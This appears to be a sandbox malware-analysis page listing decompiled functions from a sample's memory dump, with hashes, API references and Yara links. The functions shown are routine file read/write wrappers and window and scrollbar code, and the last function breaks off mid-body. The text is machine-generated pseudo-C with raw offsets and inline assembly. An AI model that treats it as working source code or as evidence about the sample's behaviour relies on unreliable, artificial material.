Opcode ID: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
Instruction ID: 62da548da4bc7eed7f0096d352448fc276db36428101ee4b016d1f9566c4e5fc
Opcode Fuzzy Hash: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
Instruction Fuzzy Hash: 66E0E53164020CBFCF219F60CC49F9D37B8E700305F508222B422D50E0D774E2968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD44, Relevance: 6.2, APIs: 4, Instructions: 170
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FD44(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x43b520 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x43b520 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t119 = _t108 + 1;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E0040AE93(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E00406F05(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00406F78())) = 9;
				_t103 = E00406F81();
				 *_t103 = _t125;
				goto L10;
			}

0x0040fd4a
0x0040fd53
0x0040fd58
0x0040fd5a
0x0040ff16
0x0040ff16
0x00000000
0x0040ff16
0x0040fd60
0x0040fd68
0x0040fd75
0x0040fd7c
0x0040fd7f
0x0040fd81
0x0040fd87
0x00000000
0x00000000
0x0040fd90
0x0040fd92
0x0040fd97
0x0040fd99
0x0040fd9c
0x0040fda0
0x0040fda3
0x0040fdaa
0x0040fdaa
0x0040fd97
0x0040fdc6
0x0040fe01
0x0040fe03
0x0040fe06
0x0040fe09
0x0040fe09
0x0040fe0d
0x0040fe11
0x0040fe13
0x0040ff11
0x00000000
0x0040ff11
0x0040fe19
0x0040fe1b
0x0040fe26
0x0040fe26
0x0040fe26
0x0040fe28
0x0040fe28
0x0040fe2a
0x0040fe30
0x0040fe33
0x0040fe35
0x0040fe37
0x0040fe3a
0x0040ff0b
0x0040ff0b
0x0040ff0b
0x0040ff0e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fe40
0x0040fe40
0x0040fe43
0x0040fe45
0x0040fe47
0x00000000
0x00000000
0x0040fe4d
0x0040fe4f
0x0040fe5d
0x0040fe60
0x0040fe80
0x0040fe8e
0x0040fe94
0x0040fe96
0x0040fea2
0x0040fea2
0x0040fea6
0x0040fee9
0x0040fee9
0x0040feec
0x0040feec
0x0040feec
0x0040feed
0x0040feed
0x0040fef0
0x0040fef3
0x00000000
0x00000000
0x00000000
0x0040fef9
0x0040fea8
0x0040feaa
0x0040feaf
0x0040fec4
0x0040fec7
0x0040fed4
0x0040fedb
0x0040fee0
0x0040fee3
0x0040fee7
0x00000000
0x00000000
0x00000000
0x0040fee7
0x0040fec9
0x0040fecd
0x00000000
0x00000000
0x0040fecf
0x0040fecf
0x00000000
0x0040fecf
0x0040feb1
0x0040feb4
0x0040feb6
0x00000000
0x00000000
0x0040feb8
0x0040febd
0x0040febe
0x00000000
0x0040febe
0x0040fe98
0x0040fe9e
0x0040fea0
0x00000000
0x00000000
0x00000000
0x0040fea0
0x0040fe65
0x0040fe66
0x0040fe69
0x0040fe71
0x0040fe74
0x0040fe75
0x00000000
0x0040fe75
0x0040fe6b
0x00000000
0x0040fe6b
0x0040fe51
0x0040fe53
0x0040fe54
0x00000000
0x0040fe54
0x0040fefd
0x0040ff01
0x0040ff03
0x0040ff05
0x0040ff07
0x0040ff07
0x0040ff09
0x0040ff09
0x00000000
0x0040ff05
0x0040fe1d
0x0040fe20
0x00000000
0x00000000
0x0040fe22
0x00000000
0x0040fe22
0x0040fdc8
0x0040fdd0
0x0040fdd3
0x0040fde9
0x0040fdec
0x00000000
0x00000000
0x0040fdf3
0x0040fdf9
0x00000000
0x0040fdf9
0x0040fdda
0x0040fde0
0x0040fde5
0x00000000

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 0040FDBE
GetLastError.KERNEL32(?,?), ref: 0040FDC8
ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?), ref: 0040FE8E
GetLastError.KERNEL32(?,?), ref: 0040FE98

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
Instruction ID: d01b3c0b8dd5da0b8901ede80a7d7d1cd1fd8d123d1325fb95f4599fb7a38ff2
Opcode Fuzzy Hash: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
Instruction Fuzzy Hash: 7051C7306043859FDF31CF58C88479A7BB0EF12304F5445BBE851AB6E2D378994ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCEC, Relevance: 6.1, APIs: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041FCEC(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t79;
				int _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t106;
				int _t120;
				void* _t128;
				void* _t132;
				intOrPtr _t138;
				void* _t140;
				void* _t143;

				_t140 = __edi;
				_t128 = __ecx;
				_t79 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t132 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t138 =  *((intOrPtr*)(__ecx + 0x8c));
				_t143 = 2;
				if(_t138 == 0xa) {
					L7:
					 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t128 + 0x28)) + _t79;
					L9:
					_t81 =  *((intOrPtr*)(_t128 + 0x30)) -  *((intOrPtr*)(_t128 + 0x28));
					__eflags = _t81;
					L10:
					if(_t81 < 0) {
						_t81 = 0;
					}
					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x68)))) + 0xbc))( &(_v28.right), _t81, _t143, _t140);
					_v12 =  *_t83;
					_v8 =  *((intOrPtr*)(_t83 + 4));
					GetWindowRect(GetDesktopWindow(),  &_v60);
					asm("movsd");
					asm("movsd");
					_t87 =  *((intOrPtr*)(_t128 + 0x8c));
					asm("movsd");
					asm("movsd");
					if(_t87 == 0xa || _t87 == 0xc) {
						_v44.left =  *((intOrPtr*)(_t128 + 0x58)) -  *((intOrPtr*)(_t128 + 0x60)) - _v12 + _v44.right;
						_v44.top =  *((intOrPtr*)(_t128 + 0x5c)) -  *((intOrPtr*)(_t128 + 0x64)) - _v8 + _v44.bottom;
						__eflags = IntersectRect( &_v28,  &_v60,  &_v44);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t128 + 0x38)) =  *((intOrPtr*)(_t128 + 0x40)) - _v12;
							_t106 =  *((intOrPtr*)(_t128 + 0x44)) - _v8;
							__eflags = _t106;
							 *((intOrPtr*)(_t128 + 0x3c)) = _t106;
							 *(_t128 + 0x48) = _v44.left;
							 *((intOrPtr*)(_t128 + 0x4c)) = _v44.top;
						}
					} else {
						_v44.right =  *((intOrPtr*)(_t128 + 0x60)) -  *((intOrPtr*)(_t128 + 0x58)) + _v44.left + _v12;
						_v44.bottom =  *((intOrPtr*)(_t128 + 0x64)) -  *((intOrPtr*)(_t128 + 0x5c)) + _v44.top + _v8;
						_t120 = IntersectRect( &_v28,  &_v60,  &_v44);
						_t152 = _t120;
						if(_t120 != 0) {
							 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x38)) + _v12;
							 *((intOrPtr*)(_t128 + 0x44)) =  *((intOrPtr*)(_t128 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t128 + 0x50)) = _v44.right;
							 *((intOrPtr*)(_t128 + 0x54)) = _v44.bottom;
						}
					}
					 *((intOrPtr*)(_t128 + 4)) = _a4;
					 *((intOrPtr*)(_t128 + 8)) = _a8;
					return E0042007A(_t128, _t152, 0);
				}
				if(_t138 == 0xb) {
					__eflags = _t138 - 0xa;
					if(_t138 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t79;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t143 = 0x22;
					if(_t138 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t132;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t132;
					}
					_t81 =  *((intOrPtr*)(_t128 + 0x34)) -  *((intOrPtr*)(_t128 + 0x2c));
					goto L10;
				}
			}

0x0041fcec
0x0041fcf6
0x0041fd01
0x0041fd06
0x0041fd08
0x0041fd11
0x0041fd12
0x0041fd36
0x0041fd36
0x0041fd3e
0x0041fd41
0x0041fd41
0x0041fd44
0x0041fd46
0x0041fd48
0x0041fd48
0x0041fd56
0x0041fd5e
0x0041fd64
0x0041fd72
0x0041fd7e
0x0041fd7f
0x0041fd80
0x0041fd86
0x0041fd87
0x0041fd8c
0x0041fdf3
0x0041fe02
0x0041fe17
0x0041fe19
0x0041fe21
0x0041fe27
0x0041fe27
0x0041fe2a
0x0041fe30
0x0041fe36
0x0041fe36
0x0041fd93
0x0041fd9f
0x0041fdae
0x0041fdbd
0x0041fdc3
0x0041fdc5
0x0041fdcd
0x0041fdd6
0x0041fddc
0x0041fde2
0x0041fde2
0x0041fdc5
0x0041fe3e
0x0041fe46
0x0041fe51
0x0041fe51
0x0041fd17
0x0041fd31
0x0041fd34
0x0041fd3b
0x0041fd3b
0x0041fd3b
0x00000000
0x0041fd3b
0x00000000
0x0041fd19
0x0041fd1e
0x0041fd1f
0x0041fd26
0x0041fd26
0x0041fd26
0x0041fd21
0x0041fd21
0x0041fd21
0x0041fd2c
0x00000000
0x0041fd2c

APIs

GetDesktopWindow.USER32 ref: 0041FD67
GetWindowRect.USER32 ref: 0041FD72
IntersectRect.USER32 ref: 0041FDBD
IntersectRect.USER32 ref: 0041FE11

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$IntersectWindow$Desktop
String ID:
API String ID: 123605412-0
Opcode ID: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
Instruction ID: 7ef3134b71351d20188b2f6e6573302e8d5814b45845c27d755b710e50fb3d9e
Opcode Fuzzy Hash: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
Instruction Fuzzy Hash: 43517272A00209DFCF54DFA8D5C4ADEBBF5BF08314B1441A6E905EB20AE734E986CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF6B, Relevance: 6.1, APIs: 4, Instructions: 135
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040AF6B(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x43b520 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E0040AE93(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00406F78())) = 0x1c;
								_t73 = E00406F81();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E00406F05(_a4);
						} else {
							 *((intOrPtr*)(E00406F78())) = 9;
							_t73 = E00406F81();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}

0x0040af77
0x0040af7c
0x0040af7f
0x0040af82
0x0040af91
0x0040afa3
0x0040afa6
0x0040afab
0x0040afb3
0x0040afb8
0x0040afbd
0x0040afbf
0x0040afc3
0x0040b097
0x0040b09d
0x0040b09f
0x0040b0b2
0x0040b0a1
0x0040b0a4
0x0040b0a7
0x0040b0a7
0x0040b053
0x0040b053
0x0040b056
0x0040b058
0x0040b0ee
0x0040b0ee
0x00000000
0x0040b0ee
0x0040b05e
0x0040b061
0x0040b0c5
0x0040b0c5
0x0040b0c7
0x0040b0cc
0x0040b0da
0x0040b0df
0x0040b0e5
0x0040b0ea
0x0040b0c0
0x00000000
0x0040b0c0
0x0040b0d1
0x0040b0d4
0x00000000
0x00000000
0x00000000
0x0040b0d4
0x0040b065
0x0040b066
0x0040b069
0x0040b0ba
0x0040b06b
0x0040b070
0x0040b076
0x0040b07b
0x0040b07b
0x00000000
0x0040b069
0x0040afcc
0x0040afcf
0x0040afd2
0x0040afd5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040afdb
0x0040afdb
0x0040afdb
0x0040afe1
0x0040afe7
0x0040afea
0x00000000
0x00000000
0x0040afef
0x0040aff2
0x0040aff4
0x0040aff7
0x0040aff9
0x0040affc
0x0040afff
0x0040afff
0x0040afff
0x0040b000
0x0040b002
0x0040b00d
0x0040b00d
0x0040b01d
0x0040b032
0x0040b038
0x0040b03a
0x0040b085
0x00000000
0x0040b085
0x0040b03c
0x0040b03f
0x0040b042
0x0040b044
0x00000000
0x00000000
0x0040b04c
0x0040b04c
0x0040b051
0x0040b051
0x00000000
0x0040b051
0x0040af84
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000001,?,?), ref: 0040B032

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
Instruction ID: 01ac4f6acfc5913959f88f192ecd96d6d2ffcc37b6012a8bce105fbf1c838ef3
Opcode Fuzzy Hash: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
Instruction Fuzzy Hash: 21519371A00209EFCB11DF68C844B9E7BB4EF41344F1581BAE825AB291D734DA51CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00427B02, Relevance: 6.1, APIs: 4, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00427B02(void* __ecx, int _a4, int _a8, int _a12) {
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t66;
				int _t68;
				void* _t69;
				intOrPtr _t75;
				intOrPtr* _t78;
				signed short _t94;
				intOrPtr* _t107;
				signed int _t110;
				int* _t111;
				intOrPtr _t113;
				void* _t114;

				_t114 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xec)) != 0) {
					_t89 = _a4;
					_t60 =  *((intOrPtr*)(__ecx + 0x90));
					 *(__ecx + 0xf8) = 1;
					_t110 = _a4 + _a4 * 4 << 3;
					 *((intOrPtr*)(_t60 + 0x20)) =  *((intOrPtr*)(_t60 + _t110 + 0x20));
					 *((intOrPtr*)(_t60 + 0x24)) =  *((intOrPtr*)(_t60 + _t110 + 0x24));
					_t61 =  *((intOrPtr*)(__ecx + 0x90));
					 *((intOrPtr*)(_t61 + 0x10)) =  *((intOrPtr*)(_t61 + _t110 + 0x10));
					 *((intOrPtr*)(_t61 + 0x14)) =  *((intOrPtr*)(_t61 + _t110 + 0x14));
					E00427C71(__ecx,  *((intOrPtr*)(__ecx + 0xf4)) + _t89, 0);
					E0042722C(__ecx,  *((intOrPtr*)(_t61 + _t110 + 0x14)), __eflags, 0);
					_t66 =  *((intOrPtr*)(_t114 + 0x90));
					_t111 = _t110 + _t66 + 0x18;
					_a8 = MulDiv(_a8,  *_t111,  *(_t110 + _t66 + 0x1c));
					_t68 = MulDiv(_a12,  *_t111, _t111[1]);
					_t107 =  *((intOrPtr*)(_t114 + 0x90));
					_a8 = _a8 +  *_t107;
					_t69 = _t68 +  *((intOrPtr*)(_t107 + 4));
					__eflags = _t69;
					_push(_t69);
					_push(_a8);
					return E0041B0C1(_t114,  *((intOrPtr*)(_t107 + 4)));
				}
				 *(__ecx + 0xf8) =  *(__ecx + 0xe8);
				ShowScrollBar( *(__ecx + 0x1c), 0, 0);
				_t75 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x114)))) + 0x5c));
				_t94 =  *((intOrPtr*)(_t75 + 0x1e));
				if(_t94 >= 0x8000) {
					L3:
					_a4 = 0;
					L4:
					ShowScrollBar( *(_t114 + 0x1c), 1, _a4);
					if(_a4 != 0) {
						_t78 =  *((intOrPtr*)(_t114 + 0x114));
						_v28 = 3;
						_t113 = 1;
						_v24 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1c) & 0x0000ffff;
						_v20 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1e) & 0x0000ffff;
						_v16 = _t113;
						if(E00415006(_t114, _t113,  &_v32, 0) == 0) {
							E00414F60(_t114, _t113, _v24, _v20, 0);
						}
					}
					return E00427C71(_t114,  *((intOrPtr*)(_t114 + 0xf4)), 1);
				}
				_a4 = 1;
				if((_t94 & 0x0000ffff) - ( *(_t75 + 0x1c) & 0x0000ffff) <= 0x7fff) {
					goto L4;
				}
				goto L3;
			}

0x00427b0a
0x00427b15
0x00427bd3
0x00427bd6
0x00427bdc
0x00427bea
0x00427bf1
0x00427bf8
0x00427bfb
0x00427c05
0x00427c0c
0x00427c1a
0x00427c22
0x00427c27
0x00427c37
0x00427c45
0x00427c4d
0x00427c4f
0x00427c57
0x00427c5f
0x00427c5f
0x00427c61
0x00427c62
0x00000000
0x00427c65
0x00427b2c
0x00427b32
0x00427b3c
0x00427b3f
0x00427b48
0x00427b62
0x00427b62
0x00427b65
0x00427b6d
0x00427b72
0x00427b74
0x00427b7a
0x00427b85
0x00427b8e
0x00427b9c
0x00427ba4
0x00427bae
0x00427bba
0x00427bba
0x00427bae
0x00000000
0x00427bc9
0x00427b53
0x00427b60
0x00000000
0x00000000
0x00000000

APIs

ShowScrollBar.USER32(?,00000000,00000000), ref: 00427B32
ShowScrollBar.USER32(?,00000001,?), ref: 00427B6D
MulDiv.KERNEL32(?,?,?), ref: 00427C40
MulDiv.KERNEL32(?,?,?), ref: 00427C4D

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ScrollShow
String ID:
API String ID: 3611344627-0
Opcode ID: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
Instruction ID: e36dfcb719c56f5c0c47cfadceb7236ddc00b612851f65575ceccfe99fb50706
Opcode Fuzzy Hash: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
Instruction Fuzzy Hash: A1417C70600615AFCB14DF29D880EAABBF5FF88308F10856EF9199B361D774E851DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042007A, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042007A(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebp;
				intOrPtr _t56;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t84;
				intOrPtr _t95;

				_t56 = 1;
				_t76 = __ecx;
				_v24 = _t56;
				_v20 = _t56;
				_push(GetStockObject(0));
				_t84 = E0041A5FC();
				_v16 = _t84;
				_v8 = E00423BE7(__eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t84;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L7:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L10:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L10;
								} else {
									goto L9;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L7;
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v12 = _v8;
					} else {
						goto L2;
					}
				} else {
					L2:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
